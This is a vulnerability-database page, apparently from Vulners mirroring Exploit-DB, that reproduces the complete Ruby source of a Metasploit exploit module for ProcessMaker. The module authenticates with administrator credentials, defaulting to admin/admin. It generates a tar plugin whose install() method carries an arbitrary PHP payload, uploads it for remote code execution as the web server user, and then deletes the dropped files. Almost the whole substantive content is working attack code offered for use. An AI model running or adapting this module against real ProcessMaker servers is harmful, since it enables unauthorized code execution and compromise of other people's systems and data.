Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ProcessMaker - Plugin Upload (Metasploit)

🗓️ 04 Apr 2018 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 39 Views

Upload plugin to ProcessMaker for executing PHP code as the web server use

Code
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ProcessMaker Plugin Upload',
      'Description'    => %q{
        This module will generate and upload a plugin to ProcessMaker
        resulting in execution of PHP code as the web server user.

        Credentials for a valid user account with Administrator roles
        is required to run this module.

        This module has been tested successfully on ProcessMaker versions
        1.6-4276, 2.0.23, 3.0 RC 1, 3.2.0, 3.2.1 on Windows 7 SP 1;
        and version 3.2.0 on Debian Linux 8.
      },
      'License'        => MSF_LICENSE,
      'Author'         => 'Brendan Coles <bcoles[at]gmail.com>',
      'References'     =>
        [
          ['URL', 'http://wiki.processmaker.com/3.0/Plugin_Development']
        ],
      'Payload'        => { 'Space' => 20000 },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic Targeting', {} ]],
      'Privileged'     => false,
      'DisclosureDate' => 'Aug 25 2010',
      'DefaultTarget'  => 0))
    register_options(
      [
        OptString.new('USERNAME', [true, 'The username for ProcessMaker', 'admin']),
        OptString.new('PASSWORD', [true, 'The password for ProcessMaker', 'admin']),
        OptString.new('WORKSPACE', [true, 'The ProcessMaker workspace', 'workflow'])
      ])
  end

  def login(user, pass)
    vars_post = Hash[{
      'form[USR_USERNAME]' => Rex::Text.uri_encode(user, 'hex-normal'),
      'form[USR_PASSWORD]' => Rex::Text.uri_encode(pass, 'hex-normal')
    }.to_a.shuffle]

    print_status "Authenticating as user '#{user}'"
    uri = normalize_uri target_uri.path, "/sys#{@workspace}/en/neoclassic/login/authentication.php"
    res = send_request_cgi 'method'    => 'POST',
                           'uri'       => uri,
                           'cookie'    => @cookie,
                           'vars_post' => vars_post

    if !res
      fail_with Failure::Unreachable, 'Connection failed'
    elsif res.code == 200 && res.body =~ /Loading styles and images/
      # ProcessMaker 2.x and 3.x
      print_good "#{peer} Authenticated as user '#{user}'"
    elsif res.code == 302 && res.headers['location'] =~ /(cases|processes)/
      # ProcessMaker 1.x
      print_good "#{peer} Authenticated as user '#{user}'"
    else
      fail_with Failure::NoAccess, "#{peer} - Authentication failed"
    end
  end

  def upload_plugin plugin_name
    data = generate_plugin plugin_name

    print_status "#{peer} Uploading plugin '#{plugin_name}' (#{data.length} bytes)"

    # ProcessMaker 1.x requires "-" after the plugin name in the file name
    fname = "#{plugin_name}-.tar"

    boundary = "----WebKitFormBoundary#{rand_text_alphanumeric rand(10) + 5}"
    post_data = "--#{boundary}\r\n"
    post_data << "Content-Disposition: form-data; name=\"__notValidateThisFields__\"\r\n"
    post_data << "\r\n\r\n"
    post_data << "--#{boundary}\r\n"
    post_data << "Content-Disposition: form-data; name=\"DynaformRequiredFields\"\r\n"
    post_data << "\r\n[]\r\n"
    post_data << "--#{boundary}\r\n"
    post_data << "Content-Disposition: form-data; name=\"form[PLUGIN_FILENAME]\"; filename=\"#{fname}\"\r\n"
    post_data << "Content-Type: application/x-tar\r\n"
    post_data << "\r\n#{data}\r\n"
    post_data << "--#{boundary}\r\n"

    uri = normalize_uri target_uri.path, "/sys#{@workspace}/en/neoclassic/setup/pluginsImportFile"
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => uri,
      'ctype'  => "multipart/form-data; boundary=#{boundary}",
      'cookie' => @cookie,
      'data'   => post_data
    }, 5)

    # Installation spawns a shell, preventing a HTTP response.
    # If a response is received, something probably went wrong.
    if res
      if res.headers['location'] =~ /login/
        fail_with Failure::NoAccess, 'Administrator privileges are required'
      else
        print_warning "#{peer} Unexpected reply"
      end
    end
  end

  def delete_plugin(plugin_name)
    uri = normalize_uri target_uri.path, "/sys#{@workspace}/en/neoclassic/setup/pluginsRemove"
    send_request_cgi({
      'method'    => 'POST',
      'uri'       => uri,
      'cookie'    => @cookie,
      'vars_post' => { 'pluginUid' => plugin_name }
    }, 5)
  end

  def generate_plugin(plugin_name)
    plugin_class = %Q|<?php
      class #{plugin_name}Class extends PMPlugin {
        function __construct() {
          set_include_path(
            PATH_PLUGINS . '#{plugin_name}' . PATH_SEPARATOR .
            get_include_path()
          );
        }
      }
    |

    plugin_php = %Q|<?php
      G::LoadClass("plugin");

      class #{plugin_name}Plugin extends PMPlugin
      {
        public function #{plugin_name}Plugin($sNamespace, $sFilename = null)
        {
          $res = parent::PMPlugin($sNamespace, $sFilename);
          $this->sFriendlyName = "#{plugin_name}";
          $this->sDescription  = "#{plugin_name}";
          $this->sPluginFolder = "#{plugin_name}";
          $this->sSetupPage    = "setup";
          $this->iVersion      = 1;
          $this->aWorkspaces   = null;
          return $res;
        }
        public function setup() {}
        public function install() { #{payload.encoded} }
        public function enable() {}
        public function disable() {}
      }

      $oPluginRegistry =& PMPluginRegistry::getSingleton();
      $oPluginRegistry->registerPlugin('#{plugin_name}', __FILE__);
    |

    tarfile = StringIO.new
    Rex::Tar::Writer.new tarfile do |tar|
      tar.add_file "#{plugin_name}.php", 0777 do |io|
        io.write plugin_php
      end
      tar.add_file "#{plugin_name}/class.#{plugin_name}.php", 0777 do |io|
        io.write plugin_class
      end
    end
    tarfile.rewind
    tarfile.read
  end

  def cleanup
    delete_plugin @plugin_name
  end

  def exploit
    @workspace = datastore['WORKSPACE']

    @cookie = "PHPSESSID=#{rand_text_alphanumeric rand(10) + 10};"
    login datastore['USERNAME'], datastore['PASSWORD']

    @plugin_name = rand_text_alpha rand(10) + 10
    upload_dir = "../../shared/sites/#{@workspace}/files/input/"
    register_file_for_cleanup "#{upload_dir}#{@plugin_name}-.tar"
    register_file_for_cleanup "#{upload_dir}#{@plugin_name}.php"
    register_file_for_cleanup "#{upload_dir}#{@plugin_name}/class.#{@plugin_name}.php"
    register_dir_for_cleanup "#{upload_dir}#{@plugin_name}"

    upload_plugin @plugin_name
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Apr 2018 00:00Current
7.4High risk
Vulners AI Score7.4
processmakerplugin uploadphp codeauthenticationuser accountadministrator rolesplugin developmentfile upload
39